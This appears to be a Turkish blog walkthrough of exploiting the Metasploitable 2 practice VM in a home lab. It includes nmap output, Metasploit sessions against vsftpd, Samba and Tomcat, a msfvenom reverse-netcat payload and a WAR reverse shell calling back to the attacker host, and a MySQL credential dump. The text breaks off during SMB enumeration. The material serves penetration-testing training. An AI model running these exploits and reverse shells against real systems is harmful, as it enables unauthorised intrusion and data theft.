99 101 121 104 117 110 32 58 47
Kendim için aldığım notlar belki sizler için de yararlı olur. TWVyYWsgYmlsZ2l5ZSBna WRlbiB5b2xkYSBlbiDDtm5 lbWxpIGFkxLFtZMSxci4=
Home Genel Metasploitable 2 Walkthrough

Metasploitable 2 Walkthrough

Metasploitable 2 sanal makinesi, sızma testi yapmayı öğrenmek isteyenler için oluşturulmuş bir deneme tahtasıdır diyebiliriz. Bu sanal makine üzerinde birçok zafiyet bulunmaktadır ve bu zafiyetlerin hepsi için geliştirilmiş exploitler mevcuttur.

Bu linkten indirme işlemi gerçekleştirilebilir. İndirilen sanal makine vmware ve virtualbox ortamlarında kullanılabilir. Kısacası bir adet Kali ve bir adet Metasploitable 2 ile kendi saldırgan ve kurban makinelerinizi (attacker – victim) oluşturmanız mümkündür.

Bu aşamada Vmware ve Virtualbox’da nasıl çalıştırılacağınıza değinmeyeceğim. Google size bu konuda yardımcı olacaktır.

Not: Metasploitable makinesinin kullanıcı adı ve parolası : msfadmin/msfadmin

Kali makinesinin (eğer ova dosyası indirdiyseniz) kullanıcı adı ve parolası : root / toor

Keşif Aşaması (Reconnaissance)

Nmap ya da netdiscover gibi araçlarla tarama yaparak aktif ip adresleri tespit edilebilir.

Biz burada nmap kullanarak ilerleyeceğiz. Metasploitable makinesinin ip adresinin bildiğin için tek bir ip adresi için tarama gerçekleştiriyorum. ( 192.168.1.0/24 yazarak tüm bloğu da tarayabilirsiniz.)

[email protected]:~# nmap -sV -A -v 192.168.1.21

NSE: Script scanning 192.168.1.21.

Initiating NSE at 14:14

NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.

Completed NSE at 14:14, 9.40s elapsed

Initiating NSE at 14:14

Completed NSE at 14:14, 14.30s elapsed

Initiating NSE at 14:14

Completed NSE at 14:14, 0.01s elapsed

Nmap scan report for 192.168.1.21

Host is up (0.00085s latency).

Not shown: 977 closed ports

PORT STATE SERVICE VERSION

21/tcp open ftp vsftpd 2.3.4

|_ftp-anon: Anonymous FTP login allowed (FTP code 230)

| ftp-syst:

| STAT:

| FTP server status:

| Connected to 192.168.1.26

| Logged in as ftp

| TYPE: ASCII

| No session bandwidth limit

| Session timeout in seconds is 300

| Control connection is plain text

| Data connections will be plain text

| vsFTPd 2.3.4 – secure, fast, stable

|_End of status

22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)

| ssh-hostkey:

| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)

|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)

23/tcp open telnet Linux telnetd

25/tcp open smtp Postfix smtpd

|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,

|_ssl-date: 2019-10-31T18:14:20+00:00; -3s from scanner time.

| sslv2:

| SSLv2 supported

| ciphers:

| SSL2_RC4_128_WITH_MD5

| SSL2_DES_64_CBC_WITH_MD5

| SSL2_RC2_128_CBC_WITH_MD5

| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5

| SSL2_RC4_128_EXPORT40_WITH_MD5

|_ SSL2_DES_192_EDE3_CBC_WITH_MD5

53/tcp open domain ISC BIND 9.4.2

| dns-nsid:

|_ bind.version: 9.4.2

80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)

| http-methods:

|_ Supported Methods: GET HEAD POST OPTIONS

|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2

|_http-title: Metasploitable2 – Linux

111/tcp open rpcbind 2 (RPC #100000)

139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)

445/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)

512/tcp open exec netkit-rsh rexecd

513/tcp open login OpenBSD or Solaris rlogind

514/tcp open shell Netkit rshd

1099/tcp open java-rmi GNU Classpath grmiregistry

1524/tcp open bindshell Metasploitable root shell

2049/tcp open nfs 2-4 (RPC #100003)

2121/tcp open ftp ProFTPD 1.3.1

3306/tcp open mysql MySQL 5.0.51a-3ubuntu5

| mysql-info:

| Protocol: 10

| Version: 5.0.51a-3ubuntu5

| Thread ID: 8

| Capabilities flags: 43564

| Some Capabilities: SupportsCompression, Support41Auth, SwitchToSSLAfterHandshake, LongColumnFlag, ConnectWithDatabase, Speaks41ProtocolNew, SupportsTransactions

| Status: Autocommit

|_ Salt: KVNd-P+’}fgRC80’q’jc

5432/tcp open postgresql PostgreSQL DB 8.3.0 – 8.3.7

|_ssl-date: 2019-10-31T18:14:20+00:00; -2s from scanner time.

5900/tcp open vnc VNC (protocol 3.3)

| vnc-info:

| Protocol version: 3.3

| Security types:

|_ VNC Authentication (2)

6000/tcp open X11 (access denied)

6667/tcp open irc UnrealIRCd

8009/tcp open ajp13 Apache Jserv (Protocol v1.3)

|_ajp-methods: Failed to get a valid response for the OPTION request

8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1

|_http-favicon: Apache Tomcat

| http-methods:

|_ Supported Methods: GET HEAD POST OPTIONS

|_http-server-header: Apache-Coyote/1.1

|_http-title: Apache Tomcat/5.5

MAC Address: 08:00:27:B5:3E:8B (Oracle VirtualBox virtual NIC)

Device type: general purpose

Running: Linux 2.6.X

OS CPE: cpe:/o:linux:linux_kernel:2.6

OS details: Linux 2.6.9 – 2.6.33

Uptime guess: 0.002 days (since Thu Oct 31 14:12:08 2019)

Network Distance: 1 hop

TCP Sequence Prediction: Difficulty=206 (Good luck!)

IP ID Sequence Generation: All zeros

Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:

|_clock-skew: mean: -2s, deviation: 0s, median: -3s

|_ms-sql-info: ERROR: Script execution failed (use -d to debug)

| nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

| Names:

| METASPLOITABLE<00> Flags: <unique><active>

| METASPLOITABLE<03> Flags: <unique><active>

| METASPLOITABLE<20> Flags: <unique><active>

| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>

| WORKGROUP<00> Flags: <group><active>

| WORKGROUP<1d> Flags: <unique><active>

|_ WORKGROUP<1e> Flags: <group><active>

|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)

|_smb-security-mode: ERROR: Script execution failed (use -d to debug)

|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE

HOP RTT ADDRESS

1 0.85 ms 192.168.1.21

NSE: Script Post-scanning.

Initiating NSE at 14:14

Completed NSE at 14:14, 0.00s elapsed

Initiating NSE at 14:14

Completed NSE at 14:14, 0.00s elapsed

Initiating NSE at 14:14

Completed NSE at 14:14, 0.00s elapsed

Read data files from: /usr/bin/../share/nmap

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 40.25 seconds

Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.430KB)

[email protected]:~#



Nmap taraması tamamlandığında açık portları ve bu portlarda çalışan servisler hakkındaki bilgilerin olduğu bir çıktı ile karşılaşıyoruz.Daha sade bir çıktı elde etmek için aşağıdaki komut kullanılabilir.

nmap -n -sV –open -p 0-65535 192.168.1.21


Port tarama işlemini gerçekleştirdiğimize göre sırayla zafiyetleri sömürmeye çalışalım.

FTP portunun açık olduğunu ve vsftpd 2.3.4 çalıştığını görüyoruz. O zaman ilk hamlemiz FTP için gelsin.

Vsftp 2.3.4 için bilinen bir zafiyet ve yayınlanmış bir exploit var mı bilgisine google üzerinden erişebiliriz. Ancak ben google aramasından önce msfconsole’u açacağım ve orada bir arama yapacağım.

[email protected]:~# msfconsole

[-] ***rtiNg the Metasploit Framework console…-

[-] * WARNING: No database support: No database YAML file

=[ metasploit v5.0.53-dev ]

+ — –=[ 1931 exploits – 1079 auxiliary – 331 post ]

+ — –=[ 556 payloads – 45 encoders – 10 nops ]

+ — –=[ 7 evasion ]

msf5 >

msf5 > search vsftpd


sf5 > search vsftpd

Matching Modules

================

# Name Disclosure Date Rank Check Description

– —- ————— —- —– ———–

0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution

msf5 >


msf5 > use exploit/unix/ftp/vsftpd_234_backdoor

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name Current Setting Required Description

—- ————— ——– ———–

RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>’

RPORT 21 yes The target port (TCP)

Exploit target:

Id Name

— —-

0 Automatic

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.1.21

RHOSTS => 192.168.1.21

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 192.168.1.21:21 – Banner: 220 (vsFTPd 2.3.4)

[*] 192.168.1.21:21 – USER: 331 Please specify the password.

[+] 192.168.1.21:21 – Backdoor service has been spawned, handling…

[+] 192.168.1.21:21 – UID: uid=0(root) gid=0(root)

[*] Found shell.

[*] Command shell session 1 opened (192.168.1.26:46385 -> 192.168.1.21:6200) at 2019-10-31 14:50:57 -0400

shell

[*] Trying to find binary(python) on target machine

[*] Found python at /usr/bin/python

[*] Using `python` to pop up an interactive shell

sh-3.2# whoami

whoami

root

sh-3.2# uname -a

uname -a

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

sh-3.2#


Sisteme erişim sağladıktan sonra whoami komutu ile sisteme root yetkisi ile erişim sağlandığı görüntülenir. Aşağıdaki şekilde bash konsoluna da geçiş yapılabilir.

sh-3.2# bash -i

bash -i

[email protected]:/#


Bu örnek için google araması ile python scriptleri bulunarak da zafiyeti sömürme işlemi gerçekleştirilebilir.

Örnek olması açısından aşağıdaki scriptler işe yarayabilir.

https://www.exploit-db.com/exploits/17491

https://raw.githubusercontent.com/In2econd/vsftpd-2.3.4-exploit/master/vsftpd_234_exploit.py

Şimdi de 139 portunu hedef alarak samba üzerinden hedef makineyi ele geçirmeye çalışalım.

msf5 > search samba smbd

Matching Modules

================

# Name Disclosure Date Rank Check Description

– —- ————— —- —– ———–

0 auxiliary/admin/smb/check_dir_file normal Yes SMB Scanner Check File/Directory Utility

1 auxiliary/admin/smb/samba_symlink_traversal normal No Samba Symlink Directory Traversal

2 auxiliary/dos/samba/lsa_addprivs_heap normal No Samba lsa_io_privilege_set Heap Overflow

3 auxiliary/dos/samba/lsa_transnames_heap normal No Samba lsa_io_trans_names Heap Overflow

4 auxiliary/dos/samba/read_nttrans_ea_list normal No Samba read_nttrans_ea_list Integer Overflow

5 auxiliary/scanner/rsync/modules_list normal Yes List Rsync Modules

6 auxiliary/scanner/smb/smb_uninit_cred normal Yes Samba _netr_ServerPasswordSet Uninitialized Credential State

7 exploit/freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86)

8 exploit/linux/samba/chain_reply 2010-06-16 good No Samba chain_reply Memory Corruption (Linux x86)

9 exploit/linux/samba/is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename() Arbitrary Module Load

10 exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow

11 exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Yes Samba SetInformationPolicy AuditEventsInfo Heap Overflow

12 exploit/linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86)

13 exploit/multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 – 2.2.6 nttrans Buffer Overflow

14 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba “username map script” Command Execution

15 exploit/osx/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow

16 exploit/osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC)

17 exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow

18 exploit/solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC)

19 exploit/unix/http/quest_kace_systems_management_rce 2018-05-31 excellent Yes Quest KACE Systems Management Command Injection

20 exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution

21 exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Yes Citrix Access Gateway Command Execution

22 exploit/windows/fileformat/ms14_060_sandworm 2014-10-14 excellent No MS14-060 Microsoft Windows OLE Package Manager Code Execution

23 exploit/windows/http/sambar6_search_results 2003-06-21 normal Yes Sambar 6 Search Results Buffer Overflow

24 exploit/windows/license/calicclnt_getconfig 2005-03-02 average No Computer Associates License Client GETCONFIG Overflow

25 exploit/windows/smb/group_policy_startup 2015-01-26 manual No Group Policy Script Execution From Shared Resource

26 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

27 post/linux/gather/enum_configs normal No Linux Gather Configurations


msf5 > use exploit/multi/samba/usermap_script

msf5 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

Name Current Setting Required Description

—- ————— ——– ———–

RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>’

RPORT 139 yes The target port (TCP)

Exploit target:

Id Name

— —-

0 Automatic

msf5 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.1.21

RHOSTS => 192.168.1.21

msf5 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP double handler on 192.168.1.26:4444

[*] Accepted the first client connection…

[*] Accepted the second client connection…

[*] Command: echo qWgXFlEMnytAxl18;

[*] Writing to socket A

[*] Writing to socket B

[*] Reading from sockets…

[*] Reading from socket B

[*] B: “qWgXFlEMnytAxl18\r\n”

[*] Matching…

[*] A is input…

[*] Command shell session 1 opened (192.168.1.26:4444 -> 192.168.1.21:33703) at 2019-10-31 15:02:21 -0400

shell

[*] Trying to find binary(python) on target machine

[*] Found python at /usr/bin/python

[*] Using `python` to pop up an interactive shell

whoami

whoami

root

sh-3.2# bash -i

bash -i

[email protected]:/# uname -a

uname -a

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

[email protected]:/#

139 nolu porttan Samba zafiyetni de sömürdük. Bu sefer biraz önce bahsettiğimiz metodu da uygulayarak devam edelim.

Google’da aşağıdaki gibi bir arama gerçekleştiriyorum.

samba smbd 3.x – 4.x exploit github


https://gist.github.com/joenorton8014/19aaa00e0088738fc429cff2669b9851 adresini açıyorum ve exploit.py dosyasını indiriyorum. Python ile çalıştırmak istediğimde nasıl kullanacağıma dair bir bilgilendirme ile karşılaşıyorum.

[email protected]:~# python exploit.py

Usage: exploit.py <HOST>

Şimdi msfvenom ile exploitin içindeki payload kısmını kendimize bind shell alacak şekilde düzenliyoruz.

[email protected]:~# msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.1.26 LPORT=6666 -f python

[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload

[-] No arch selected, selecting arch: cmd from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 94 bytes

Final size of python file: 475 bytes

buf = b””

buf += b”\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x65″

buf += b”\x65\x64\x64\x74\x3b\x20\x6e\x63\x20\x31\x39\x32\x2e”

buf += b”\x31\x36\x38\x2e\x31\x2e\x32\x36\x20\x36\x36\x36\x36″

buf += b”\x20\x30\x3c\x2f\x74\x6d\x70\x2f\x65\x65\x64\x64\x74″

buf += b”\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20\x3e\x2f”

buf += b”\x74\x6d\x70\x2f\x65\x65\x64\x64\x74\x20\x32\x3e\x26″

buf += b”\x31\x3b\x20\x72\x6d\x20\x2f\x74\x6d\x70\x2f\x65\x65″

buf += b”\x64\x64\x74″

[email protected]:~#


Buradan elde ettiğimiz çıktıyı exploitimizin içindeki alanla aşağıda gördüğünüz gibi değiştiriyoruz.


Exploiti çalıştırmadan önce netcat ile msfvenom ile ürettiğimiz payload’da belirttiğimiz portu dinlemeye başlıyoruz.

[email protected]:~# nc -nvlp 6666

listening on [any] 6666 …

Şimdi exploit.py dosyasını çalıştırabiliriz.

[email protected]:~# python exploit.py 192.168.1.21


Şimdi netcat ile dinleme yaptığımız terminale geçiş yapalım.

[email protected]:~# nc -nvlp 6666

listening on [any] 6666 …

connect to [192.168.1.26] from (UNKNOWN) [192.168.1.21] 52985

whoami

root

uname -a

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

bash -i

bash: no job control in this shell

[email protected]:/#


Ve python scripti ile de metasploitable makinesindeki samba zafiyetini sömürmeyi başardık.

Bu seferde web portlarından biri ile devam edelim. 8180 portunda Apache Tomcat/Coyote JSP engine 1.1 çalıştığını görmüştük yaptığımız taramada. Bu bilgi doğrultusunda biraz bilgi toplayarak ilerleyelim.

8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1

Bu sefer de arama ile bilgi toplama aşamasını başlatalım.

msf5 > search apache tomcat

Matching Modules

================

# Name Disclosure Date Rank Check Description

– —- ————— —- —– ———–

0 auxiliary/admin/appletv/appletv_display_video normal No Apple TV Video Remote Control

1 auxiliary/admin/http/tomcat_administration normal Yes Tomcat Administration Tool Default Access

2 auxiliary/admin/http/tomcat_utf8_traversal 2009-01-09 normal Yes Tomcat UTF-8 Directory Traversal Vulnerability

3 auxiliary/admin/http/trendmicro_dlp_traversal 2009-01-09 normal Yes TrendMicro Data Loss Prevention 5.5 Directory Traversal

4 auxiliary/dos/http/apache_commons_fileupload_dos 2014-02-06 normal No Apache Commons FileUpload and Apache Tomcat DoS

5 auxiliary/dos/http/apache_mod_isapi 2010-03-05 normal No Apache mod_isapi Dangling Pointer

6 auxiliary/dos/http/apache_range_dos 2011-08-19 normal Yes Apache Range Header DoS (Apache Killer)

7 auxiliary/dos/http/apache_tomcat_transfer_encoding 2010-07-09 normal No Apache Tomcat Transfer-Encoding Information Disclosure and DoS

8 auxiliary/dos/http/hashcollision_dos 2011-12-28 normal No Hashtable Collisions

9 auxiliary/fileformat/odt_badodt 2018-05-01 normal No LibreOffice 6.03 /Apache OpenOffice 4.1.5 Malicious ODT File Generator

10 auxiliary/gather/apache_rave_creds normal No Apache Rave User Information Disclosure

11 auxiliary/gather/impersonate_ssl normal No HTTP SSL Certificate Impersonation

12 auxiliary/scanner/couchdb/couchdb_enum normal Yes CouchDB Enum Utility

13 auxiliary/scanner/http/apache_activemq_source_disclosure normal Yes Apache ActiveMQ JSP Files Source Disclosure

14 auxiliary/scanner/http/apache_activemq_traversal normal Yes Apache ActiveMQ Directory Traversal

15 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner

16 auxiliary/scanner/http/apache_optionsbleed 2017-09-18 normal Yes Apache Optionsbleed Scanner

17 auxiliary/scanner/http/apache_userdir_enum normal Yes Apache “mod_userdir” User Enumeration

18 auxiliary/scanner/http/axis_local_file_include normal Yes Apache Axis2 v1.4.1 Local File Inclusion

19 auxiliary/scanner/http/axis_login normal Yes Apache Axis2 Brute Force Utility

20 auxiliary/scanner/http/mod_negotiation_brute normal Yes Apache HTTPD mod_negotiation Filename Bruter

21 auxiliary/scanner/http/mod_negotiation_scanner normal Yes Apache HTTPD mod_negotiation Scanner

22 auxiliary/scanner/http/rewrite_proxy_bypass normal Yes Apache Reverse Proxy Bypass Vulnerability Scanner

23 auxiliary/scanner/http/tomcat_enum normal Yes Apache Tomcat User Enumeration

24 auxiliary/scanner/http/tomcat_mgr_login normal Yes Tomcat Application Manager Login Utility

25 auxiliary/scanner/http/wangkongbao_traversal normal Yes WANGKONGBAO CNS-1000 and 1100 UTM Directory Traversal

26 auxiliary/scanner/ssh/apache_karaf_command_execution 2016-02-09 normal Yes Apache Karaf Default Credentials Command Execution

27 auxiliary/scanner/ssh/karaf_login normal Yes Apache Karaf Login Utility

msf5 > use auxiliary/scanner/http/tomcat_mgr_login

msf5 auxiliary(scanner/http/tomcat_mgr_login) > show options

Module options (auxiliary/scanner/http/tomcat_mgr_login):

Name Current Setting Required Description

—- ————— ——– ———–

BLANK_PASSWORDS false no Try blank passwords for all users

BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5

DB_ALL_CREDS false no Try each user/password couple stored in the current database

DB_ALL_PASS false no Add all passwords in the current database to the list

DB_ALL_USERS false no Add all users in the current database to the list

PASSWORD no The HTTP password to specify for authentication

PASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line

Proxies no A proxy chain of format type:host:port[,type:host:port][…]

RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>’

RPORT 8080 yes The target port (TCP)

SSL false no Negotiate SSL/TLS for outgoing connections

STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host

TARGETURI /manager/html yes URI for Manager login. Default is /manager/html

THREADS 1 yes The number of concurrent threads

USERNAME no The HTTP username to specify for authentication

USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line

USER_AS_PASS false no Try the username as the password for all users

USER_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line

VERBOSE true yes Whether to print output for all attempts

VHOST no HTTP server virtual host

msf5 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS 192.168.1.21

RHOSTS => 192.168.1.21

msf5 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180

RPORT => 8180

 

Ve tüm ayarları yaptıktan sonra exploit komutunu çalıştırıyoruz.

msf5 auxiliary(scanner/http/tomcat_mgr_login) > exploit

-] 192.168.1.21:8180 – LOGIN FAILED: tomcat:manager (Incorrect)

[-] 192.168.1.21:8180 – LOGIN FAILED: tomcat:role1 (Incorrect)

[-] 192.168.1.21:8180 – LOGIN FAILED: tomcat:root (Incorrect)

[+] 192.168.1.21:8180 – Login Successful: tomcat:tomcat

[-] 192.168.1.21:8180 – LOGIN FAILED: both:admin (Incorrect)

[-] 192.168.1.21:8180 – LOGIN FAILED: both:manager (Incorrect)

[-] 192.168.1.21:8180 – LOGIN FAILED: both:role1 (Incorrect)

[-] 192.168.1.21:8180 – LOGIN FAILED: both:root (Incorrect)

[-] 192.168.1.21:8180 – LOGIN FAILED: both:tomcat (Incorrect)

[-] 192.168.1.21:8180 – LOGIN FAILED: both:s3cret (Incorrect)

[-] 192.168.1.21:8180 – LOGIN FAILED: both:vagrant (Incorrect)

[-] 192.168.1.21:8180 – LOGIN FAILED: j2deployer:j2deployer (Incorrect)

[-] 192.168.1.21:8180 – LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect)

[-] 192.168.1.21:8180 – LOGIN FAILED: cxsdk:kdsxc (Incorrect)

[-] 192.168.1.21:8180 – LOGIN FAILED: root:owaspbwa (Incorrect)

[-] 192.168.1.21:8180 – LOGIN FAILED: ADMIN:ADMIN (Incorrect)

[-] 192.168.1.21:8180 – LOGIN FAILED: xampp:xampp (Incorrect)

[-] 192.168.1.21:8180 – LOGIN FAILED: QCC:QLogic66 (Incorrect)

[-] 192.168.1.21:8180 – LOGIN FAILED: admin:vagrant (Incorrect)

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf5 auxiliary(scanner/http/tomcat_mgr_login) >


Kullanıcı adı ve parola olarak tomcat / tomcat kullanarak login olabileceğimizi görüyoruz.

Biraz önce yaptığımız arama sonuçlarından elde ettiğimiz bilgiler doğrultusunda devam ediyoruz.

msf5 auxiliary(scanner/http/tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_upload

msf5 exploit(multi/http/tomcat_mgr_upload) > set RHOSTS 192.168.1.21

RHOSTS => 192.168.1.21

msf5 exploit(multi/http/tomcat_mgr_upload) > set RPORT 8180

RPORT => 8180

msf5 exploit(multi/http/tomcat_mgr_upload) > set httpusername tomcat

httpusername => tomcat

msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword tomcat

httppassword => tomcat

msf5 exploit(multi/http/tomcat_mgr_upload) > exploit

[*] Started reverse TCP handler on 192.168.1.26:4444

[*] Retrieving session ID and CSRF token…

[*] Uploading and deploying 3jgtKzPZ0…

[*] Executing 3jgtKzPZ0…

[*] Undeploying 3jgtKzPZ0 …

[*] Sending stage (53906 bytes) to 192.168.1.21

[*] Meterpreter session 1 opened (192.168.1.26:4444 -> 192.168.1.21:42558) at 2019-10-31 15:46:09 -0400

meterpreter > shell

Process 1 created.

Channel 1 created.

bash -i

bash: no job control in this shell

[email protected]:/$

Kendimize bir backdoor oluşturalım.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.26 LPORT=6666 -f war > c3shell.war


Browser’dan 192.168.1.21:8180 adresini çağırdıktan sonra gelen sayfadan Tomcat Manager’ı tıklıyoruz.

Kullanıcı adı ve parolayı zaten biraz önce bulmuştuk.


WAR file to deploy kısmından Browse diyerek biraz önce msfvenom ile oluşturduğumuz c3shell.war dosyasını yükleyip Deploy butonuna basıyoruz.


Yine terminalde netcat ile dinleme işlemini başlatıyoruz.

[email protected]:~# nc -nvlp 6666

listening on [any] 6666 …

Browser’dan deploy ettiğimiz sayfaya erişim sağlamak istediğimizde shell aldığımızı görüyoruz.


Nmap taramızda açık olan portlardan 3306 ile devam edelim. 3306 Mysql portu olduğu için ilk olarak mysql root kullanıcı ile bağlanmayı deneyelim.

3306/tcp open mysql MySQL 5.0.51a-3ubuntu5

[email protected]:~# mysql -u root -p -h 192.168.1.21

Enter password:

Welcome to the MariaDB monitor. Commands end with ; or \g.

Your MySQL connection id is 10

Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.

MySQL [(none)]>


Bingo. Mysql default kurulumda boş parola ile konsoldan erişime izin verir ancak uzak bağlantıya izin vermez. Bu özel bir makine olduğu için bunda da açık bırakılmış.

Şimdi mysql komutları ile ilerleyebiliriz. Bakalım neler bulacağız.

MySQL [(none)]> show databases;

+——————–+

| Database |

+——————–+

| information_schema |

| dvwa |

| metasploit |

| mysql |

| owasp10 |

| tikiwiki |

| tikiwiki195 |

+——————–+

7 rows in set (0.001 sec)

MySQL [(none)]> use owasp10;

Reading table information for completion of table and column names

You can turn off this feature to get a quicker startup with -A

Database changed

MySQL [owasp10]> show tables;

+——————-+

| Tables_in_owasp10 |

+——————-+

| accounts |

| blogs_table |

| captured_data |

| credit_cards |

| hitlog |

| pen_test_tools |

+——————-+

6 rows in set (0.001 sec)

MySQL [owasp10]> select * from accounts;

+—–+———-+————–+—————————–+———-+

| cid | username | password | mysignature | is_admin |

+—–+———-+————–+—————————–+———-+

| 1 | admin | adminpass | Monkey! | TRUE |

| 2 | adrian | somepassword | Zombie Films Rock! | TRUE |

| 3 | john | monkey | I like the smell of confunk | FALSE |

| 4 | jeremy | password | d1373 1337 speak | FALSE |

| 5 | bryce | password | I Love SANS | FALSE |

| 6 | samurai | samurai | Carving Fools | FALSE |

| 7 | jim | password | Jim Rome is Burning | FALSE |

| 8 | bobby | password | Hank is my dad | FALSE |

| 9 | simba | password | I am a cat | FALSE |

| 10 | dreveil | password | Preparation H | FALSE |

| 11 | scotty | password | Scotty Do | FALSE |

| 12 | cal | password | Go Wildcats | FALSE |

| 13 | john | password | Do the Duggie! | FALSE |

| 14 | kevin | 42 | Doug Adams rocks | FALSE |

| 15 | dave | set | Bet on S.E.T. FTW | FALSE |

| 16 | ed | pentest | Commandline KungFu anyone? | FALSE |

+—–+———-+————–+—————————–+———-+

16 rows in set (0.002 sec)

MySQL [owasp10]>



Gördüğünüz gibi tüm kullanıcı adı ve parola bilgilerine ulaşım sağladık.

1524 portunda bindshell Metasploitable root shell gibi bir açıklama vardı nmap taramamızın sonuçlarında. Belki de en kolay shell alma işlemini bu port üzerinden gerçekleştireceğiz.

Yapmamız gereken tek şey;

[email protected]:~# nc 192.168.1.21 1524

[email protected]:/# whoami

root

[email protected]:/# uname -a

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

[email protected]:/#

Fazla kolay değil mi? Bazen basit düşünmek gerekiyor.

NFS ile devam ediyoruz.

2049/tcp open nfs 2-4 (RPC #100003)

Madem nfs üzerinden zafiyeti sömürmeye çalışacağız o zaman hedef makine üzerindeki paylaşımları ve bu paylaşımların izinlerini listeleyerek işe başlayabiliriz.

[email protected]:~# smbmap -H 192.168.1.21

[+] Finding open SMB ports….

[+] User SMB session establishd on 192.168.1.21…

[+] IP: 192.168.1.21:445    Name: 192.168.1.21

    Disk     Permissions

    —-     ———–

    print$     NO ACCESS

    tmp     READ, WRITE

    opt     NO ACCESS

    IPC$     NO ACCESS

    ADMIN$     NO ACCESS

[email protected]:~#


Süper /tmp dizini için okuma ve yazmanın açık olduğu bir paylaşım var. Bunu kendi makinemize mount edelim o zaman.

[email protected]:~# smbclient //192.168.1.21/tmp

Enter WORKGROUP\root’s password:

Anonymous login successful

Try “help” to get a list of possible commands.

smb: \>

Neler yapabildiğimizi görmek için biraz etrafı kolaçan edelim.



Dizinde kilitli kalmış gibi görünüyoruz. Help dediğimizde çıkan komutlarla ilerleyebilir miyiz acaba?

